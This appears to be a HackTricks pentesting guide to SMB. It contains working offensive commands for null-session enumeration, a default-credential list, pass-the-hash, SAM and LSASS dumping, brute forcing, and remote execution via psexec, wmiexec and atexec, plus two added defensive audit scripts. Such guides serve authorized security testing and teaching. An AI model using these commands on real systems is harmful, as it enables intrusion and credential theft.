
139,445 - Pentesting SMB

☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Port 139

NetBIOS stands for Network Basic Input Output System. It is a software protocol that allows applications, PCs and desktops on a local area network (LAN) to communicate with network hardware and to transmit data across the network. Software applications that run on a NetBIOS network locate and identify each other via their NetBIOS names. A NetBIOS name is up to 16 characters long and is usually separate from the computer name. Two applications start a NetBIOS session when one (the client) sends a command to "call" another client (the server) over TCP port 139. (extracted from here)

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

Port 445

While port 139 is technically known as "NBT over IP", port 445 is "SMB over IP". SMB stands for "Server Message Blocks". Server Message Block, in modern language, is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for providing shared access to files, printers, serial ports and other sorts of communication between nodes on a network.

For instance, on Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445. On other systems, you will find services and applications using port 139. This means that SMB is running with NetBIOS over TCP/IP. (extracted from here)

445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

SMB

Server Message Block (SMB) is a client-server protocol that regulates access to files, entire directories and other network resources such as printers, routers or interfaces released for the network. The main application area of the protocol is the Windows family of operating systems, whose network services support SMB in a downward-compatible way; this means that devices with newer editions can easily communicate with devices that have an older Microsoft operating system installed.
Through the free software project Samba, SMB can also be used on Linux and Unix distributions, enabling cross-platform communication via SMB.

An SMB server can provide arbitrary parts of its local file system as shares. Therefore the hierarchy visible to a client is partially independent of the structure on the server. Access rights are defined by Access Control Lists (ACLs). They can be controlled in a fine-grained manner, based on attributes such as execute, read and full access, for individual users or user groups. The ACLs are defined per share and therefore do not correspond to the rights assigned locally on the server.

IPC$ Share

From the book Network Security Assessment 3rd edition

With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. The enum4linux utility within Kali Linux is useful; with it, you can obtain the following:

  • Operating system information
  • Details of the parent domain
  • A list of local users and groups
  • Details of available SMB shares
  • The effective system security policy

What is NTLM

If you don't know what NTLM is, or you want to know how it works and how to abuse it, you will find this page about NTLM very interesting; it explains how the protocol works and how you can take advantage of it:

{% content-ref url="../windows-hardening/ntlm/" %} ntlm {% endcontent-ref %}

Server Enumeration

Scan a network searching for hosts:

nbtscan -r 192.168.0.1/24

SMB server version

To look for possible vulnerabilities in the SMB version it is important to know which version is in use. If this information does not appear in other tools, you can:

  • Use the MSF auxiliary module auxiliary/scanner/smb/smb_version
  • or use this script:

```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
# Usage: ./smbver.sh RHOST [RPORT] [IFACE]  (RPORT defaults to 139, IFACE to tap0)
if [ -z "$1" ]; then echo "Usage: ./smbver.sh RHOST {RPORT} {IFACE}" && exit 1; else rhost="$1"; fi
if [ -n "$2" ]; then rport="$2"; else rport=139; fi
if [ -n "$3" ]; then iface="$3"; else iface=tap0; fi
# Sniff the first 7 packets coming back from the target and pull the "Unix Samba x.y.z" banner out of them
tcpdump -s0 -n -i "$iface" src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
# Trigger a null login so the server sends its banner while tcpdump is listening
echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
echo "" && sleep .1
```

Search for exploits

To search for exploits, you can use various tools and resources. Here are some common methods:

  • Exploit Databases: Websites like Exploit-DB, Rapid7, and Metasploit provide extensive databases of known exploits. You can search these databases using relevant keywords or specific vulnerabilities.

  • Vulnerability Scanners: Tools like Nessus, OpenVAS, and Nexpose can scan networks and systems for known vulnerabilities and provide a list of potential exploits.

  • Security Bulletins: Software vendors and security organizations often release security bulletins that detail vulnerabilities and their associated exploits. These bulletins can be found on the vendor's website or through security advisory services.

  • Exploit Frameworks: Frameworks like Metasploit offer a wide range of exploits and payloads that can be used for penetration testing. These frameworks provide a command-line interface for searching and executing exploits.

Remember to always use these tools and resources responsibly and with proper authorization. Unauthorized exploitation of vulnerabilities is illegal and unethical.

msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb

Possible Credentials

| Username(s) | Common passwords |
|---|---|
| (blank) | (blank) |
| guest | (blank) |
| Administrator, admin | (blank), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |

SMB Environment Information

Obtain Information

#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

Enumerate users, groups and logged-on users

This information should already have been gathered by enum4linux and enum4linux-ng.

crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups

Enumerate local users

Impacket

lookupsid.py -no-pass hostname.local


for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Metasploit - Enumerate local users

use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run

Enumerating LSARPC and SAMR with rpcclient

{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %} rpcclient-enumeration.md {% endcontent-ref %}

GUI connection from linux

In the terminal:

xdg-open smb://cascade.htb/

In file browser window (nautilus, thunar, etc)

smb://friendzone.htb/general/

Shared Folders Enumeration

List shared folders

It is always recommended to check whether you can access anything; if you don't have credentials, try using null credentials or the guest user.

```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> # If you omit the password it will be prompted. With --pw-nt-hash, the password provided is the NT hash

smbmap -H <IP> [-P <PORT>] # Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] # Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] # Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] # Recursive list

crackmapexec smb <IP> -u '' -p '' --shares # Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares # Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares # Guest user
```

### **Connect/List a shared folder**

```bash
# Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> # If you omit the password it will be prompted. With --pw-nt-hash, the password provided is the NT hash
# Use --no-pass -c 'recurse;ls' to list recursively with smbclient

# List with smbmap; without a folder it lists everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] # Pass-the-Hash
```

Manually enumerate windows shares and connect to them

It may be that you are restricted from listing any shares of the host machine, so when you try to list them it appears as if there are no shares to connect to. Thus it might be worth a shot to try to connect to a share manually. To enumerate the shares manually, look for responses like NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME when using a valid session (e.g. a null session or valid credentials). These indicate whether the share exists but you do not have access to it, or whether the share does not exist at all.

Common share names for windows targets are

  • C$
  • D$
  • ADMIN$
  • IPC$
  • PRINT$
  • FAX$
  • SYSVOL
  • NETLOGON

(Common share names from Network Security Assessment 3rd edition)

You can try to connect to them by using the following command

```bash
# Connect to a Windows share using a null session
smbclient -U '%' -N \\\\<IP>\\<SHARE>
# Connect to a Windows share using an authenticated session (you will be prompted for a password)
smbclient -U '<USER>' \\\\<IP>\\<SHARE>
```

or this script (using a null session)

```bash
#!/bin/bash

ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in "${shares[@]}"; do
    # Capture stderr too, since smbclient reports NT_STATUS errors there as well
    output=$(smbclient -U '%' -N "\\\\$ip\\$share" -c '' 2>&1)

    if [[ -z $output ]]; then
        echo "[+] Creating a null session is possible for $share" # no output means the command succeeded, so a session was established
    else
        echo "$output" # echo the error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
    fi
done
```

Examples

```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```

### Mount a shared folder

```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```

### **Download files**

Read previous sections to learn how to connect with credentials/Pass-the-Hash.

```bash
# Search for a file and download it
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it into /usr/share/smbmap
# Download everything
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
# Downloads everything to the current directory
```

Commands:

  • mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files)
  • recurse: toggles recursion on (default: off)
  • prompt: toggles prompting for filenames off (default: on)
  • mget: copies all files matching the mask from host to client machine

(Information from the manpage of smbclient)

  • Snaffler

```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```

- `-s` prints results to stdout as they are found.
- `-d domain.local` sets the domain whose computers and shares are enumerated.
- `-o snaffler.log` also writes the results to the file snaffler.log.
- `-v data` sets the verbosity level so that the interesting file hits are shown.

  • CrackMapExec spider.
  • -M spider_plus [--share <share_name>]
  • --pattern txt

```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```

Especially interesting among the files in shares are those called Registry.xml, as they may contain passwords for users configured with autologon via Group Policy, and web.config files, as they contain credentials.

{% hint style="info" %} The SYSVOL share is readable by all authenticated users in the domain. In there you may find many different batch, VBScript, and PowerShell scripts.
You should check the scripts inside of it as you might find sensitive info such as passwords. {% endhint %}

Read Registry

You may be able to read the registry using some discovered credentials. Impacket reg.py allows you to try:

```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```

Post Exploitation

The default config of a Samba server is usually located in /etc/samba/smb.conf and might have some dangerous configs:

| Setting | Description |
|---|---|
| browseable = yes | Allow listing available shares in the current share? |
| read only = no | Forbid the creation and modification of files? |
| writable = yes | Allow users to create and modify files? |
| guest ok = yes | Allow connecting to the service without using a password? |
| enable privileges = yes | Honor privileges assigned to specific SIDs? |
| create mask = 0777 | What permissions must be assigned to newly created files? |
| directory mask = 0777 | What permissions must be assigned to newly created directories? |
| logon script = script.sh | What script needs to be executed on the user's login? |
| magic script = script.sh | Which script should be executed when the script gets closed? |
| magic output = script.out | Where the output of the magic script needs to be stored? |

The command smbstatus gives information about the server and about who is connected.
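As an added example (not code from the HackTricks page or from Samba), the following audit reads an smb.conf and flags the risky settings from the table above; the config it checks is a constructed sample with made-up share names and paths, embedded so it runs offline.

```bash
#!/bin/sh
# Added example, not from the HackTricks page: flag the risky smb.conf settings
# listed in the table above. The sample config below is constructed.

SAMPLE_SMB_CONF='[global]
   workgroup = WORKGROUP
   server string = File Server
   logon script = logon.bat

[public]
   path = /srv/samba/public
   browseable = yes
   guest ok = yes
   read only = no
   create mask = 0777
   directory mask = 0777

[finance]
   path = /srv/samba/finance
   valid users = @finance
   read only = yes
   create mask = 0660
'

# audit_smb_conf: reads an smb.conf on stdin and prints one "section: finding"
# line per risky setting. Assumes the usual INI layout ([section] headers,
# one "key = value" per line, ";" or "#" comment lines).
audit_smb_conf() {
    awk '
    function norm(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return tolower(s) }
    /^[ \t]*[;#]/ { next }                  # skip comment lines
    /^[ \t]*\[/   { sec = $0; sub(/^[ \t]*\[/, "", sec); sub(/\].*$/, "", sec); next }
    index($0, "=") > 0 {
        key = norm(substr($0, 1, index($0, "=") - 1))
        val = norm(substr($0, index($0, "=") + 1))
        if (key == "guest ok" && val == "yes")
            print sec ": guest ok = yes (no password needed to connect)"
        else if (key == "read only" && val == "no")
            print sec ": read only = no (clients can create and modify files)"
        else if (key == "writable" && val == "yes")
            print sec ": writable = yes (clients can create and modify files)"
        else if (key == "enable privileges" && val == "yes")
            print sec ": enable privileges = yes (SID privileges are honoured)"
        else if ((key == "create mask" || key == "directory mask") && val ~ /[2367]$/)
            print sec ": " key " = " val " (world-writable: others get the write bit)"
        else if (key == "logon script" || key == "magic script" || key == "magic output")
            print sec ": " key " = " val " (script run or output written on the server; review it)"
    }'
}

# Stand-alone run: audit the constructed sample and print the findings.
printf '%s\n' "$SAMPLE_SMB_CONF" | audit_smb_conf
```

Run it against a real server with `audit_smb_conf < /etc/samba/smb.conf`; settings that only appear in included files or via `testparm` output are not followed.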

Authenticate using Kerberos

You can authenticate to Kerberos using the tools smbclient and rpcclient:

```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```

## **Execute Commands**

### **crackmapexec**

crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:

```bash
apt-get install crackmapexec
# Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
# Execute cmd
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
# Pass-the-Hash
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami
# Use a different execution method
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --exec-method {mmcexec,smbexec,atexec,wmiexec}
# Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam
# Dump LSASS in-memory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa
# Get sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions
# Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users
# Enumerate disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks
# Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users
# Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups
# Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups
# Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol
# RID brute force
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute
# Pass-The-Hash
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH>
```

### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)

Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

```bash
# If you don't specify the password, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Pass-the-Hash
```

Using the parameter `-k` you can authenticate against Kerberos instead of NTLM.

wmiexec/dcomexec

Stealthily execute a command shell without touching the disk or running a new service using DCOM via port 135.
In kali it is located on /usr/share/doc/python3-impacket/examples/

```bash
# If you don't specify the password, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> # Password will be prompted
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 # Pass-the-Hash
# You can append the CMD command to execute at the end of the line; if you don't, a semi-interactive shell is prompted
```

Using the parameter `-k` you can authenticate against Kerberos instead of NTLM.

```bash
# If you don't specify the password, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
# You can append the CMD command to execute at the end of the line; if you don't, a semi-interactive shell is prompted
```

AtExec

Execute commands via the Task Scheduler (using \pipe\atsvc via SMB).
In kali it is located on /usr/share/doc/python3-impacket/examples/

```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes LM:NT administrator@10.10.10.175 "whoami"
```

Impacket reference

https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/

Bruteforce users credentials

This is not recommended; you could lock out an account if you exceed the maximum number of allowed attempts.

```shell
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt # Get usernames by brute-forcing RIDs, then try to brute-force each username
```

## SMB relay attack

This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

## SMB-Trap

The Windows library URLMon.dll automatically tries to authenticate to the host when a page tries to access some content via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`

This happens with the functions:

* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream

Which are used by some browsers and tools (like Skype)
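From the detection side, as an added example that is not part of the original page: a grep-based check that flags resource references in HTML which point at a remote host over SMB (UNC paths such as `\\host\share\...` and `file://host/...` URLs), the kind of reference that makes URLMon-based clients attempt authentication. The sample HTML is constructed.

```bash
#!/bin/sh
# Added example, not from the HackTricks page: find resource references in HTML
# that point at a remote host over SMB (UNC paths like \\host\share\file and
# file://host/share URLs). The sample document below is constructed.

SAMPLE_HTML='<html><body>
<img src="https://example.com/logo.png">
<img src="\\10.10.10.10\path\image.jpg">
<a href="file://fileserver01/share/doc.pdf">doc</a>
<a href="file:///C:/Users/Public/readme.txt">local</a>
</body></html>'

# find_unc_refs: reads HTML on stdin and prints each src/href/background/action
# attribute whose value is a UNC path (\\host\...) or a file:// URL with a
# non-empty host (file://host/...). file:///C:/... has an empty host and refers
# to a local file, so it is deliberately not reported.
find_unc_refs() {
    grep -Eio '(src|href|background|action)="(\\\\[^"]+|file://[^"/][^"]*)"'
}

# Stand-alone run: print the suspicious references found in the sample.
printf '%s\n' "$SAMPLE_HTML" | find_unc_refs
```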

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)

### SMBTrap using MitMf

![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)

## NTLM Theft

Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can elicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack).

[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)

## HackTricks Automatic Commands

```text
Protocol Name: SMB
Port Number: 137,138,139
Protocol Description: Server Message Block

Entry 1:
  Name: Notes
  Description: Notes for SMB
  Note: |
    While port 139 is technically known as "NBT over IP", port 445 is "SMB over IP". SMB stands for "Server Message Blocks". Server Message Block, in modern language, is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for providing shared access to files, printers, serial ports and other sorts of communication between nodes on a network.

    #These are the commands I run, in order, every time I see an open SMB port

    With No Creds
    nbtscan {IP}
    smbmap -H {IP}
    smbmap -H {IP} -u null -p null
    smbmap -H {IP} -u guest
    smbclient -N -L //{IP}
    smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
    rpcclient {IP}
    rpcclient -U "" {IP}
    crackmapexec smb {IP}
    crackmapexec smb {IP} --pass-pol -u "" -p ""
    crackmapexec smb {IP} --pass-pol -u "guest" -p ""
    GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
    GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
    GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
    getArch.py -target {IP}

    With Creds
    smbmap -H {IP} -u {Username} -p {Password}
    smbclient "\\{IP}\" -U {Username} -W {Domain_Name} -l {IP}
    smbclient "\\{IP}\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash hash
    crackmapexec smb {IP} -u {Username} -p {Password} --shares
    GetADUsers.py {Domain_Name}/{Username}:{Password} -all
    GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
    GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

    https://book.hacktricks.xyz/pentesting/pentesting-smb

Entry 2:
  Name: Enum4Linux
  Description: General SMB Scan
  Command: enum4linux -a {IP}

Entry 3:
  Name: Nmap SMB Scan 1
  Description: SMB Vuln Scan With Nmap
  Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry 4:
  Name: Nmap SMB Scan 2
  Description: SMB Vuln Scan With Nmap (Less Specific)
  Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}

Entry 5:
  Name: Hydra Brute Force
  Description: Needs a username
  Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Entry 6:
  Name: SMB/SMB2 139/445 msf enumeration without running msfconsole
  Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```

